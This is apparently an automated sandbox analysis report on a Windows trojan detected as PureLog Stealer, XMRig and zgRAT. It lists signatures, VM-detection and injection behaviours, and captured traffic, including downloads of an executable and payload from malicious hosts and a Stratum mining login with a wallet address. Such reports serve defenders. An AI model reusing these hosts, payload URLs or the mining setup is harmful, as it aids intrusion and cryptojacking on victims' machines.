Windows Analysis Report
zlONcFaXkc.exe

Overview

General Information

Sample name: zlONcFaXkc.exe
(renamed because the original name is a hash value)
Original sample name: 1c762a2cd186f1cde4b9e5d743eca3b5.exe
Analysis ID: 1430590
MD5: 1c762a2cd186f1cde4b9e5d743eca3b5
SHA1: a0eff9fa7b5ada96c8acf483de9519a9e2548d80
SHA256: a5b0d190fc09cd5c1ea07fa6b12a7dd4ab5f517c778fb60e4e14060e00ddecc8
Tags: 64, exe, trojan

Detection

PureLog Stealer, Xmrig, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: Xmrig
Snort IDS alert for network traffic
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Connects to many ports of the same IP (likely port scanning)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected PersistenceViaHiddenTask
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a Chrome extension
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Chromium Browser Instance Executed With Custom Extension
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

Source: zlONcFaXkc.exe Avira: detected
Source: http://185.196.10.233/dll/ghghghgfg.xml Avira URL Cloud: Label: malware
Source: zlONcFaXkc.exe Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 1.2.Target.exe.1d0abdfaef0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AddInProcess.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.4120488458.000001978E306000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4120488458.000001978E2D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4110650202.0000000140799000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4120488458.000001978E339000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.4137105635.000001D0ABDF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4110650202.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess.exe PID: 7492, type: MEMORYSTR
Source: global traffic TCP traffic: 192.168.2.4:49840 -> 185.196.10.233:35662 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"zephs72fkdmidnggbpghxjhndpe49prja1tvhrycwapy9vlqpybiqf527bidskd3jsjydzy5ubzexc3fnoxu4rbvgyx1b5vnkjf.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: Target.exe, 00000001.00000002.4137105635.000001D0ABDF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: XMRig 6.21.0
Source: unknown HTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: zlONcFaXkc.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: zcezeaqsuhi.exe, 00000002.00000000.1717795774.000002A5B9702000.00000002.00000001.01000000.00000008.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2015898421.000002A5BB410000.00000002.00000001.00040000.00000008.sdmp, zcezeaqsuhi.exe.1.dr
Source: Binary string: mscorlib.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: System.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: Lwbtkgrhgw.pdb source: zlONcFaXkc.exe, 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: Hider.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD304.tmp.dmp.9.dr
Source: Binary string: protobuf-net.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: System.pdb source: WERD304.tmp.dmp.9.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source: Binary string: System.Core.ni.pdb source: WERD304.tmp.dmp.9.dr
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.4:49732 -> 179.43.170.230:80
Source: global traffic TCP traffic: 185.196.10.233 ports 39001,0,1,3,35662,80,9
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 185.196.10.233:39001
Source: global traffic HTTP traffic detected: GET /ttt.exe HTTP/1.1Host: starsmm.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dll/ghghghgfg.xml HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 131.253.33.200 131.253.33.200
Source: Joe Sandbox View IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View IP Address: 52.159.108.190 52.159.108.190
Source: Joe Sandbox View IP Address: 13.107.213.41 13.107.213.41
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.21.237
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.21.237
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.21.237
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: global traffic HTTP traffic detected: GET /crx/blobs/AfQPRnlBHVf9QbAmjPnmJQnDwEcerxafOq8p01cAfJ5QoFk2s6gAMnMY_23BNiizXK2e-3smriJGTe2WOZO9s5X2xejbvoKpPILOKN2-0t9ZbrurACaLAMZSmuXX9slHldVQ07B5bvw6KCm_x6CONA/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_76_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.6c9316b09d3f8e566483.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.119ca1abd9fdaf26e071.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.7f8ced0e5ba45618e733.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.ece9643c5babc8e535e2.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
